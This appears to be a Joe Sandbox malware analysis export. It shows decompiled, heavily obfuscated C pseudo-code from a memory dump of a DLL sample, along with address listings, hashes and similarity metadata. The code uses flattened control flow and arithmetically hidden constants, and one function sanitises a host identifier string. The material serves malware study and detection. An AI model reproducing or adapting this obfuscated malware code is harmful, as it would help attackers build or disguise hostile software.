				_v60 = _v60 ^ 0x000a96ad;
				_v16 = 0xa888b5;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x4445c6cc;
				_v104 = 0xee35af;
				_v104 = _v104 ^ 0xea83652e;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x536d6a1f;
				_v12 = 0x6066b2;
				_v12 = _v12 + 0xb1d6;
				_v12 = _v12 ^ 0x00605003;
				_v40 = 0x2dba20;
				_v40 = _v40 * 0x73;
				_v40 = _v40 ^ 0x1485b41c;
				_v136 = 0xfcb12d;
				_v136 = _v136 << 1;
				_v136 = _v136 + 0xaead;
				_v136 = _v136 + 0xffffaecb;
				_v136 = _v136 ^ 0x01ffed69;
				_v24 = 0x751c6a;
				_t387 = 0x7d;
				_v24 = _v24 / _t387;
				_v24 = _v24 ^ 0x0002b143;
				_v68 = 0x69a6e2;
				_v68 = _v68 + 0xaa03;
				_v68 = _v68 ^ 0x73662bb1;
				_v68 = _v68 ^ 0x730f0150;
				_v100 = 0xcb496d;
				_v100 = _v100 >> 1;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x0008f604;
				_v56 = 0x2cd04e;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0x0162f7e8;
				_v32 = 0xb2ca4d;
				_v32 = _v32 + 0x32b9;
				_v32 = _v32 ^ 0x00b4bcfb;
				_v64 = 0x655992;
				_v64 = _v64 >> 5;
				_v64 = _v64 | 0x6342cf71;
				_v64 = _v64 ^ 0x634627b6;
				_v116 = 0x833545;
				_v116 = _v116 * 0x75;
				_v116 = _v116 + 0xeb9e;
				_v116 = _v116 * 0x6f;
				_v116 = _v116 ^ 0x00ae15cd;
				while(1) {
					L1:
					_t364 = 0x917a7c8;
					do {
						if(_t379 == 0x771143) {
							_t379 = 0x6e440a7;
							goto L9;
						} else {
							if(_t379 == 0x1a710aa) {
								E02AEF7FE(_v64, _v8, _v116, _v72);
							} else {
								if(_t379 == 0x6e440a7) {
									_push(_v92);
									_push(_v76);
									_push(_v108);
									_t367 = E02AFE1F8(0x2ae14c8, _v120, __eflags);
									_push(_v112);
									_push(_v96);
									_push(_v52);
									__eflags = E02AE738A(_v156, _t367, _v164, _v44,  &_v8, E02AFE1F8(0x2ae1318, _v144, __eflags), _v128) - _v148;
									_t379 =  ==  ? 0x917a7c8 : 0x14ee4a5;
									E02AFFECB(_t367, _v140, _v88, _v28, _v36);
									E02AFFECB(_t368, _v80, _v124, _v132, _v20);
									_t425 = _v4;
									_t430 =  &(_t430[0x11]);
									_t364 = 0x917a7c8;
									goto L9;
								} else {
									_t436 = _t379 - _t364;
									if(_t379 != _t364) {
										goto L9;
									} else {
										_push(_v16);
										_push(_v60);
										_push(_v160);
										_t375 = E02AFE1F8(0x2ae1368, _v48, _t436);
										_t420 =  *0x2b06224; // 0x0
										E02AEBC32( *((intOrPtr*)(_t425 + 4)), _t420 + 0x48, _v152, _v104, _v12, _t375,  *_t425, _v40, _v136, _v8, 0x2ae1368, _v24);
										_t379 = 0x1a710aa;
										_t429 =  ==  ? 1 : _t429;
										E02AFFECB(_t375, _v68, _v100, _v56, _v32);
										_t430 =  &(_t430[0x10]);
										goto L1;
									}
								}
							}
						}
						L12:
						return _t429;
						L9:
						__eflags = _t379 - 0x14ee4a5;
					} while (__eflags != 0);
					goto L12;
				}
			}


























































                                                                                                          0x02af8fae
                                                                                                          0x02af8fb4
                                                                                                          0x02af8fbe
                                                                                                          0x02af8fc6
                                                                                                          0x02af8fce
                                                                                                          0x02af8fd6
                                                                                                          0x02af8fe6
                                                                                                          0x02af8fe8
                                                                                                          0x02af8fec
                                                                                                          0x02af8fef
                                                                                                          0x02af8ff6
                                                                                                          0x02af8ffb
                                                                                                          0x02af9004
                                                                                                          0x02af9008
                                                                                                          0x02af9010
                                                                                                          0x02af9018
                                                                                                          0x02af9025
                                                                                                          0x02af9029
                                                                                                          0x02af9031
                                                                                                          0x02af9039
                                                                                                          0x02af9041
                                                                                                          0x02af9049
                                                                                                          0x02af904e
                                                                                                          0x02af9056
                                                                                                          0x02af905e
                                                                                                          0x02af9066
                                                                                                          0x02af906b
                                                                                                          0x02af9073
                                                                                                          0x02af907b
                                                                                                          0x02af9083
                                                                                                          0x02af908b
                                                                                                          0x02af9093
                                                                                                          0x02af909b
                                                                                                          0x02af90a3
                                                                                                          0x02af90ab
                                                                                                          0x02af90b3
                                                                                                          0x02af90bb
                                                                                                          0x02af90c3
                                                                                                          0x02af90cb
                                                                                                          0x02af90d0
                                                                                                          0x02af90d8
                                                                                                          0x02af90e0
                                                                                                          0x02af90e8
                                                                                                          0x02af90f0
                                                                                                          0x02af90f8
                                                                                                          0x02af9100
                                                                                                          0x02af9105
                                                                                                          0x02af910d
                                                                                                          0x02af9115
                                                                                                          0x02af911d
                                                                                                          0x02af9128
                                                                                                          0x02af9130
                                                                                                          0x02af913b
                                                                                                          0x02af9143
                                                                                                          0x02af914b
                                                                                                          0x02af9153
                                                                                                          0x02af915b
                                                                                                          0x02af9168
                                                                                                          0x02af916c
                                                                                                          0x02af9171
                                                                                                          0x02af9179
                                                                                                          0x02af9181
                                                                                                          0x02af9189
                                                                                                          0x02af918e
                                                                                                          0x02af9196
                                                                                                          0x02af919e
                                                                                                          0x02af91a6
                                                                                                          0x02af91ab
                                                                                                          0x02af91b8
                                                                                                          0x02af91bc
                                                                                                          0x02af91c4
                                                                                                          0x02af91ce
                                                                                                          0x02af91d4
                                                                                                          0x02af91d9
                                                                                                          0x02af91df
                                                                                                          0x02af91e7
                                                                                                          0x02af91ef
                                                                                                          0x02af91f7
                                                                                                          0x02af91ff
                                                                                                          0x02af920b
                                                                                                          0x02af9210
                                                                                                          0x02af921a
                                                                                                          0x02af921f
                                                                                                          0x02af9225
                                                                                                          0x02af922d
                                                                                                          0x02af9235
                                                                                                          0x02af923d
                                                                                                          0x02af9242
                                                                                                          0x02af924a
                                                                                                          0x02af9255
                                                                                                          0x02af9260
                                                                                                          0x02af926b
                                                                                                          0x02af9276
                                                                                                          0x02af9281
                                                                                                          0x02af928c
                                                                                                          0x02af9294
                                                                                                          0x02af92a0
                                                                                                          0x02af92a3
                                                                                                          0x02af92a7
                                                                                                          0x02af92af
                                                                                                          0x02af92b7
                                                                                                          0x02af92bc
                                                                                                          0x02af92c1
                                                                                                          0x02af92c6
                                                                                                          0x02af92ce
                                                                                                          0x02af92d6
                                                                                                          0x02af92de
                                                                                                          0x02af92e3
                                                                                                          0x02af92e8
                                                                                                          0x02af92f0
                                                                                                          0x02af92fb
                                                                                                          0x02af9306
                                                                                                          0x02af9311
                                                                                                          0x02af931c
                                                                                                          0x02af9327
                                                                                                          0x02af9332
                                                                                                          0x02af933f
                                                                                                          0x02af9343
                                                                                                          0x02af934b
                                                                                                          0x02af9350
                                                                                                          0x02af9358
                                                                                                          0x02af9360
                                                                                                          0x02af9365
                                                                                                          0x02af936d
                                                                                                          0x02af9378
                                                                                                          0x02af9380
                                                                                                          0x02af938b
                                                                                                          0x02af9393
                                                                                                          0x02af939b
                                                                                                          0x02af93a0
                                                                                                          0x02af93a8
                                                                                                          0x02af93b3
                                                                                                          0x02af93be
                                                                                                          0x02af93c9
                                                                                                          0x02af93dc
                                                                                                          0x02af93e5
                                                                                                          0x02af93f0
                                                                                                          0x02af93f8
                                                                                                          0x02af93fc
                                                                                                          0x02af9404
                                                                                                          0x02af940c
                                                                                                          0x02af9414
                                                                                                          0x02af9428
                                                                                                          0x02af942b
                                                                                                          0x02af9432
                                                                                                          0x02af943d
                                                                                                          0x02af9445
                                                                                                          0x02af944d
                                                                                                          0x02af9455
                                                                                                          0x02af945d
                                                                                                          0x02af9465
                                                                                                          0x02af9469
                                                                                                          0x02af946e
                                                                                                          0x02af9476
                                                                                                          0x02af947e
                                                                                                          0x02af9483
                                                                                                          0x02af948b
                                                                                                          0x02af9496
                                                                                                          0x02af94a1
                                                                                                          0x02af94ac
                                                                                                          0x02af94b4
                                                                                                          0x02af94b9
                                                                                                          0x02af94c1
                                                                                                          0x02af94c9
                                                                                                          0x02af94d6
                                                                                                          0x02af94da
                                                                                                          0x02af94e7
                                                                                                          0x02af94eb
                                                                                                          0x02af94f3
                                                                                                          0x02af94f3
                                                                                                          0x02af94f3
                                                                                                          0x02af94f8
                                                                                                          0x02af94fe
                                                                                                          0x02af9688
                                                                                                          0x00000000
                                                                                                          0x02af9504
                                                                                                          0x02af950a
                                                                                                          0x02af96ae
                                                                                                          0x02af9510
                                                                                                          0x02af9516
                                                                                                          0x02af95c7
                                                                                                          0x02af95d0
                                                                                                          0x02af95d4
                                                                                                          0x02af95dc
                                                                                                          0x02af95e1
                                                                                                          0x02af95ec
                                                                                                          0x02af95f0
                                                                                                          0x02af9630
                                                                                                          0x02af9647
                                                                                                          0x02af9655
                                                                                                          0x02af9672
                                                                                                          0x02af9677
                                                                                                          0x02af967e
                                                                                                          0x02af9681
                                                                                                          0x00000000
                                                                                                          0x02af951c
                                                                                                          0x02af951c
                                                                                                          0x02af951e
                                                                                                          0x00000000
                                                                                                          0x02af9524
                                                                                                          0x02af9524
                                                                                                          0x02af9530
                                                                                                          0x02af9534
                                                                                                          0x02af953f
                                                                                                          0x02af9575
                                                                                                          0x02af9581
                                                                                                          0x02af959b
                                                                                                          0x02af95a7
                                                                                                          0x02af95ba
                                                                                                          0x02af95bf
                                                                                                          0x00000000
                                                                                                          0x02af95bf
                                                                                                          0x02af951e
                                                                                                          0x02af9516
                                                                                                          0x02af950a
                                                                                                          0x02af96b7
                                                                                                          0x02af96c1
                                                                                                          0x02af968d
                                                                                                          0x02af968d
                                                                                                          0x02af968d
                                                                                                          0x00000000
                                                                                                          0x02af9699

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: <S$tU$zPB
                                                                                                          • API String ID: 0-3909742637
                                                                                                          • Opcode ID: b066c51f3fd34d2e0ab09eed6da88ad109ef786c4e512c39947c0f32d974a5f2
                                                                                                          • Instruction ID: 3103a907ca67dde21ff630a2825d60fad5f89e4339bc89db1e1456c1c89629b2
                                                                                                          • Opcode Fuzzy Hash: b066c51f3fd34d2e0ab09eed6da88ad109ef786c4e512c39947c0f32d974a5f2
                                                                                                          • Instruction Fuzzy Hash: E9F10E715083819FD7A8CF21C58AA4BBBF2FBC5748F10891DE6DA86260D7B58909CF43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF9DF5, Relevance: 4.0, Strings: 3, Instructions: 223COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 93%
                                                                                                          			E02AF9DF5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				unsigned int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t196;
				void* _t219;
				char _t222;
				void* _t227;
				char* _t235;
				void* _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int* _t272;

				_push(_a12);
				_t259 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t196);
				_v164 = 0xe41f8c;
				_t272 =  &(( &_v208)[5]);
				_v164 = _v164 << 0x10;
				_t227 = 0xb5c0777;
				_t260 = 0x69;
				_v164 = _v164 * 0x11;
				_v164 = _v164 ^ 0x18467706;
				_v180 = 0xeb334b;
				_v180 = _v180 ^ 0xb42ec71e;
				_v180 = _v180 << 0xf;
				_v180 = _v180 ^ 0xfa2f170d;
				_v204 = 0x9173d0;
				_v204 = _v204 / _t260;
				_v204 = _v204 + 0xc6b3;
				_t261 = 0x22;
				_v204 = _v204 / _t261;
				_v204 = _v204 ^ 0x000ee5cc;
				_v176 = 0x7c8d5;
				_v176 = _v176 | 0x723fe192;
				_v176 = _v176 + 0x4897;
				_v176 = _v176 ^ 0x724c9210;
				_v184 = 0xa283a5;
				_v184 = _v184 >> 0xd;
				_v184 = _v184 >> 9;
				_v184 = _v184 ^ 0x00039d39;
				_v172 = 0xfcf8f5;
				_t262 = 0x68;
				_v172 = _v172 / _t262;
				_t263 = 0x12;
				_v172 = _v172 / _t263;
				_v172 = _v172 ^ 0x0008ec4c;
				_v196 = 0x6ce5d4;
				_v196 = _v196 + 0x3b25;
				_v196 = _v196 ^ 0x77f3da3b;
				_v196 = _v196 + 0xa9d5;
				_v196 = _v196 ^ 0x779af0ad;
				_v156 = 0x25f26f;
				_t264 = 0x4f;
				_v156 = _v156 / _t264;
				_v156 = _v156 ^ 0x000ca3cb;
				_v188 = 0x55ff28;
				_t265 = 7;
				_v188 = _v188 / _t265;
				_t266 = 0x50;
				_v188 = _v188 / _t266;
				_v188 = _v188 ^ 0x000cd773;
				_v148 = 0x9faf35;
				_v148 = _v148 >> 0xb;
				_v148 = _v148 ^ 0x00041a0d;
				_v144 = 0xb9aa79;
				_v144 = _v144 + 0xffff300b;
				_v144 = _v144 ^ 0x00b65e72;
				_v152 = 0xe2e022;
				_v152 = _v152 << 0xa;
				_v152 = _v152 ^ 0x8b87efd2;
				_v140 = 0x6f845f;
				_v140 = _v140 ^ 0xc6ebfb93;
				_v140 = _v140 ^ 0xc684fc76;
				_v208 = 0x15bd2c;
				_v208 = _v208 + 0xca24;
				_v208 = _v208 + 0xaf45;
				_v208 = _v208 >> 5;
				_v208 = _v208 ^ 0x000727e8;
				_v136 = 0x982476;
				_v136 = _v136 | 0xd92aa943;
				_v136 = _v136 ^ 0xd9b01548;
				_v160 = 0x20104f;
				_v160 = _v160 ^ 0xef20d220;
				_t267 = 0x2e;
				_v160 = _v160 * 0x21;
				_v160 = _v160 ^ 0xcf1410de;
				_v168 = 0x2e9b6b;
				_v168 = _v168 + 0xffff5c1c;
				_v168 = _v168 * 0x26;
				_v168 = _v168 ^ 0x06dc91dd;
				_v192 = 0xd01025;
				_v192 = _v192 | 0x8f03462b;
				_v192 = _v192 + 0xffffdaa2;
				_v192 = _v192 << 2;
				_v192 = _v192 ^ 0x3f4450ba;
				_v200 = 0xfd9656;
				_v200 = _v200 | 0x00ba0155;
				_v200 = _v200 / _t267;
				_t268 = 0x6a;
				_v200 = _v200 / _t268;
				_v200 = _v200 ^ 0x00073cbf;
				while(_t227 != 0x9fc41a2) {
					if(_t227 == 0xa1171ea) {
						_v132 = 0x80;
						_t222 = E02AF96C2(_v164, _v180, _v204, _v176,  &_v128,  &_v132);
						_t272 =  &(_t272[4]);
						_t227 = 0xabd7dae;
						continue;
					} else {
						if(_t227 == 0xabd7dae) {
							__eflags = _v128;
							_t235 =  &_v128;
							while(__eflags != 0) {
								_t222 =  *_t235;
								__eflags = _t222 - 0x30;
								if(_t222 < 0x30) {
									L9:
									__eflags = _t222 - 0x61;
									if(_t222 < 0x61) {
										L11:
										__eflags = _t222 - 0x41;
										if(_t222 < 0x41) {
											L13:
											 *_t235 = 0x58;
										} else {
											__eflags = _t222 - 0x5a;
											if(_t222 > 0x5a) {
												goto L13;
											}
										}
									} else {
										__eflags = _t222 - 0x7a;
										if(_t222 > 0x7a) {
											goto L11;
										}
									}
								} else {
									__eflags = _t222 - 0x39;
									if(_t222 > 0x39) {
										goto L9;
									}
								}
								_t235 = _t235 + 1;
								__eflags =  *_t235;
							}
							_t227 = 0x9fc41a2;
							continue;
						} else {
							if(_t227 == 0xb5c0777) {
								_t227 = 0xa1171ea;
								continue;
							}
						}
					}
					L18:
					__eflags = _t227 - 0x108096a;
					if(__eflags != 0) {
						continue;
					}
					return _t222;
				}
				_push(_v156);
				_push(_v196);
				_push(0x2ae119c);
				_t219 = E02AF4244(_v184, _v172, __eflags);
				E02B00A1A(E02AF5515(__eflags), __eflags, _t219, _v152,  &_v128, _v188, _t259, _v140, _v208, _v136);
				_t222 = E02AFFECB(_t219, _v160, _v168, _v192, _v200);
				_t272 =  &(_t272[0xe]);
				_t227 = 0x108096a;
				goto L18;
			}








































                                                                                                          0x02af9dff
                                                                                                          0x02af9e06
                                                                                                          0x02af9e08
                                                                                                          0x02af9e0f
                                                                                                          0x02af9e16
                                                                                                          0x02af9e17
                                                                                                          0x02af9e18
                                                                                                          0x02af9e1d
                                                                                                          0x02af9e25
                                                                                                          0x02af9e28
                                                                                                          0x02af9e34
                                                                                                          0x02af9e3b
                                                                                                          0x02af9e3e
                                                                                                          0x02af9e42
                                                                                                          0x02af9e4a
                                                                                                          0x02af9e52
                                                                                                          0x02af9e5a
                                                                                                          0x02af9e5f
                                                                                                          0x02af9e67
                                                                                                          0x02af9e77
                                                                                                          0x02af9e7b
                                                                                                          0x02af9e87
                                                                                                          0x02af9e8c
                                                                                                          0x02af9e92
                                                                                                          0x02af9e9a
                                                                                                          0x02af9ea2
                                                                                                          0x02af9eaa
                                                                                                          0x02af9eb2
                                                                                                          0x02af9eba
                                                                                                          0x02af9ec2
                                                                                                          0x02af9ec7
                                                                                                          0x02af9ecc
                                                                                                          0x02af9ed4
                                                                                                          0x02af9ee0
                                                                                                          0x02af9ee5
                                                                                                          0x02af9eef
                                                                                                          0x02af9ef4
                                                                                                          0x02af9efa
                                                                                                          0x02af9f02
                                                                                                          0x02af9f0a
                                                                                                          0x02af9f12
                                                                                                          0x02af9f1a
                                                                                                          0x02af9f22
                                                                                                          0x02af9f2a
                                                                                                          0x02af9f36
                                                                                                          0x02af9f3b
                                                                                                          0x02af9f41
                                                                                                          0x02af9f49
                                                                                                          0x02af9f55
                                                                                                          0x02af9f5a
                                                                                                          0x02af9f64
                                                                                                          0x02af9f69
                                                                                                          0x02af9f6f
                                                                                                          0x02af9f7c
                                                                                                          0x02af9f89
                                                                                                          0x02af9f8e
                                                                                                          0x02af9f96
                                                                                                          0x02af9f9e
                                                                                                          0x02af9fa6
                                                                                                          0x02af9fae
                                                                                                          0x02af9fb6
                                                                                                          0x02af9fbb
                                                                                                          0x02af9fc3
                                                                                                          0x02af9fcb
                                                                                                          0x02af9fd3
                                                                                                          0x02af9fdb
                                                                                                          0x02af9fe3
                                                                                                          0x02af9feb
                                                                                                          0x02af9ff3
                                                                                                          0x02af9ff8
                                                                                                          0x02afa000
                                                                                                          0x02afa008
                                                                                                          0x02afa010
                                                                                                          0x02afa018
                                                                                                          0x02afa020
                                                                                                          0x02afa02d
                                                                                                          0x02afa030
                                                                                                          0x02afa034
                                                                                                          0x02afa03c
                                                                                                          0x02afa044
                                                                                                          0x02afa051
                                                                                                          0x02afa055
                                                                                                          0x02afa05d
                                                                                                          0x02afa065
                                                                                                          0x02afa06d
                                                                                                          0x02afa075
                                                                                                          0x02afa07a
                                                                                                          0x02afa082
                                                                                                          0x02afa08a
                                                                                                          0x02afa09a
                                                                                                          0x02afa0a2
                                                                                                          0x02afa0a5
                                                                                                          0x02afa0a9
                                                                                                          0x02afa0b1
                                                                                                          0x02afa0bb
                                                                                                          0x02afa10b
                                                                                                          0x02afa129
                                                                                                          0x02afa12e
                                                                                                          0x02afa131
                                                                                                          0x00000000
                                                                                                          0x02afa0bd
                                                                                                          0x02afa0c3
                                                                                                          0x02afa0d5
                                                                                                          0x02afa0da
                                                                                                          0x02afa0de
                                                                                                          0x02afa0e0
                                                                                                          0x02afa0e2
                                                                                                          0x02afa0e4
                                                                                                          0x02afa0ea
                                                                                                          0x02afa0ea
                                                                                                          0x02afa0ec
                                                                                                          0x02afa0f2
                                                                                                          0x02afa0f2
                                                                                                          0x02afa0f4
                                                                                                          0x02afa0fa
                                                                                                          0x02afa0fa
                                                                                                          0x02afa0f6
                                                                                                          0x02afa0f6
                                                                                                          0x02afa0f8
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02afa0f8
                                                                                                          0x02afa0ee
                                                                                                          0x02afa0ee
                                                                                                          0x02afa0f0
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02afa0f0
                                                                                                          0x02afa0e6
                                                                                                          0x02afa0e6
                                                                                                          0x02afa0e8
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02afa0e8
                                                                                                          0x02afa0fd
                                                                                                          0x02afa0fe
                                                                                                          0x02afa0fe
                                                                                                          0x02afa103
                                                                                                          0x00000000
                                                                                                          0x02afa0c5
                                                                                                          0x02afa0cb
                                                                                                          0x02afa0d1
                                                                                                          0x00000000
                                                                                                          0x02afa0d1
                                                                                                          0x02afa0cb
                                                                                                          0x02afa0c3
                                                                                                          0x02afa1a9
                                                                                                          0x02afa1a9
                                                                                                          0x02afa1af
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02afa1bf
                                                                                                          0x02afa1bf
                                                                                                          0x02afa13b
                                                                                                          0x02afa13f
                                                                                                          0x02afa14b
                                                                                                          0x02afa150
                                                                                                          0x02afa185
                                                                                                          0x02afa19c
                                                                                                          0x02afa1a1
                                                                                                          0x02afa1a4
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: "$%;$K3
                                                                                                          • API String ID: 0-3594330084
                                                                                                          • Opcode ID: 08f140a50ee9426f2fdd7f517be4724867767ba22f78cd42877991b24092c389
                                                                                                          • Instruction ID: f42c65045a158f6fcc97021ec10ab5e73579e174a8fbdf77f75ba353dbacaa93
                                                                                                          • Opcode Fuzzy Hash: 08f140a50ee9426f2fdd7f517be4724867767ba22f78cd42877991b24092c389
                                                                                                          • Instruction Fuzzy Hash: 68A174725083809FD394CFA6D58555BBBE2FBC8758F00891DF18996220D7B98949CF47
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEA445, Relevance: 4.0, Strings: 3, Instructions: 213COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 98%
                                                                                                          			E02AEA445() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t198;
				signed int _t201;
				signed int _t203;
				void* _t206;
				void* _t220;
				void* _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				intOrPtr _t229;
				intOrPtr* _t230;
				signed int _t231;
				signed int* _t232;

				_t232 =  &_v84;
				_v16 = 0x845726;
				_v16 = _v16 << 7;
				_t206 = 0xba97f4f;
				_v16 = _v16 ^ 0x422a9300;
				_v76 = 0xf633ca;
				_v76 = _v76 + 0xffff7f31;
				_v76 = _v76 << 6;
				_v76 = _v76 | 0x2929f239;
				_v76 = _v76 ^ 0x3d62fec6;
				_v20 = 0xcffe1c;
				_v20 = _v20 ^ 0x03d09261;
				_v20 = _v20 ^ 0x03162068;
				_v24 = 0xa4ea56;
				_v24 = _v24 + 0xffff4c41;
				_v24 = _v24 ^ 0x00afa4b9;
				_v40 = 0x50bd11;
				_v40 = _v40 + 0xffffa7ab;
				_v40 = _v40 * 0x3f;
				_t225 = 0;
				_v40 = _v40 ^ 0x13cebba3;
				_v60 = 0x50c08b;
				_v60 = _v60 ^ 0xc2cf2608;
				_v60 = _v60 << 4;
				_t226 = 0x56;
				_v60 = _v60 / _t226;
				_v60 = _v60 ^ 0x0073141c;
				_v64 = 0xa37df4;
				_v64 = _v64 + 0xffffdd88;
				_v64 = _v64 + 0xe629;
				_v64 = _v64 << 3;
				_v64 = _v64 ^ 0x0527d1d9;
				_v68 = 0x27b9fb;
				_t227 = 0x58;
				_v68 = _v68 / _t227;
				_v68 = _v68 * 0x63;
				_v68 = _v68 * 0x3d;
				_v68 = _v68 ^ 0x0aa4ff90;
				_v72 = 0x604a05;
				_v72 = _v72 | 0x3301bbe0;
				_v72 = _v72 + 0xf4ce;
				_v72 = _v72 + 0xffff6149;
				_v72 = _v72 ^ 0x336b10da;
				_v52 = 0x457d04;
				_v52 = _v52 * 0x45;
				_v52 = _v52 | 0xd82309ca;
				_v52 = _v52 + 0xff64;
				_v52 = _v52 ^ 0xdab2f2cc;
				_v8 = 0x71eccb;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000a626b;
				_v12 = 0x94a0c6;
				_v12 = _v12 + 0xffffb2fd;
				_v12 = _v12 ^ 0x009145d9;
				_v56 = 0xdce517;
				_v56 = _v56 >> 1;
				_v56 = _v56 | 0xebc149ed;
				_v56 = _v56 + 0xffff7372;
				_v56 = _v56 ^ 0xebe5f8bb;
				_v44 = 0x6f3a42;
				_v44 = _v44 ^ 0x930a70ca;
				_v44 = _v44 ^ 0x072310e6;
				_v44 = _v44 ^ 0x944572d0;
				_v28 = 0xde598c;
				_v28 = _v28 + 0xffffb8ee;
				_v28 = _v28 ^ 0x00dc27c3;
				_v80 = 0x428d3e;
				_v80 = _v80 * 0x44;
				_v80 = _v80 + 0x7fb1;
				_v80 = _v80 ^ 0x009e7bae;
				_v80 = _v80 ^ 0x11330260;
				_v84 = 0x321edf;
				_v84 = _v84 | 0x009a6787;
				_v84 = _v84 ^ 0xc86f44a5;
				_v84 = _v84 ^ 0xbb12ab62;
				_v84 = _v84 ^ 0x73cf70d9;
				_v48 = 0x740eb7;
				_v48 = _v48 * 0x2b;
				_v48 = _v48 * 0x4f;
				_v48 = _v48 + 0xb6e6;
				_v48 = _v48 ^ 0x040daff3;
				_v32 = 0x3035f0;
				_v32 = _v32 ^ 0xe5f6800a;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0xcb8c371c;
				_v36 = 0xd97c9c;
				_v36 = _v36 >> 3;
				_v36 = _v36 * 0x24;
				_v36 = _v36 ^ 0x03d4918e;
				_v4 = 0x2cfea0;
				_v4 = _v4 ^ 0xf57e16a0;
				_v4 = _v4 ^ 0xf550cd22;
				_t205 = _v4;
				_t231 = _v4;
				_t228 = _v4;
				while(1) {
					L1:
					_push(0x5c);
					while(1) {
						L2:
						_t198 = 0xd71e2f;
						do {
							L3:
							while(_t206 != _t198) {
								if(_t206 == 0x1e5f8bf) {
									_t201 = E02AEEE62(_v60, _t205, _v64, _v68, _v72, _v16, _t228);
									_t232 =  &(_t232[5]);
									_t231 = _t201;
									_t198 = 0xd71e2f;
									_t206 =  !=  ? 0xd71e2f : 0x6f129a6;
									_t220 = 0x5c;
									continue;
								} else {
									if(_t206 == 0x6f129a6) {
										E02AE3046(_v48, _v32, _v36, _t205, _v4);
									} else {
										if(_t206 == 0x960e40f) {
											_t203 = E02AFE8B6(_t206, _v20, _v24, _t206, _v76, _v40);
											_t205 = _t203;
											_t232 =  &(_t232[4]);
											if(_t203 != 0) {
												_t206 = 0x1e5f8bf;
												goto L1;
											}
										} else {
											if(_t206 == 0xba97f4f) {
												_t206 = 0xbab8332;
												continue;
											} else {
												if(_t206 == 0xbab8332) {
													_t229 =  *0x2b06214; // 0x0
													_t230 = _t229 + 0x23c;
													while( *_t230 != _t220) {
														_t230 = _t230 + 2;
													}
													_t228 = _t230 + 2;
													_t206 = 0x960e40f;
													goto L2;
												} else {
													if(_t206 != 0xe557a67) {
														goto L20;
													} else {
														E02AE3046(_v44, _v28, _v80, _t231, _v84);
														_t232 =  &(_t232[3]);
														_t206 = 0x6f129a6;
														while(1) {
															L1:
															_push(0x5c);
															L2:
															_t198 = 0xd71e2f;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L23:
								return _t225;
							}
							E02AE1E9B(_v52, _t231, _v8, _v12, _v56);
							_t232 =  &(_t232[3]);
							_t198 = 0xd71e2f;
							_t225 =  !=  ? 1 : _t225;
							_t206 = 0xe557a67;
							_t220 = 0x5c;
							L20:
						} while (_t206 != 0x6b89e3f);
						goto L23;
					}
				}
			}





































                                                                                                          0x02aea445
                                                                                                          0x02aea448
                                                                                                          0x02aea452
                                                                                                          0x02aea457
                                                                                                          0x02aea45c
                                                                                                          0x02aea464
                                                                                                          0x02aea46c
                                                                                                          0x02aea474
                                                                                                          0x02aea479
                                                                                                          0x02aea481
                                                                                                          0x02aea489
                                                                                                          0x02aea491
                                                                                                          0x02aea499
                                                                                                          0x02aea4a1
                                                                                                          0x02aea4a9
                                                                                                          0x02aea4b1
                                                                                                          0x02aea4b9
                                                                                                          0x02aea4c1
                                                                                                          0x02aea4d2
                                                                                                          0x02aea4d6
                                                                                                          0x02aea4d8
                                                                                                          0x02aea4e0
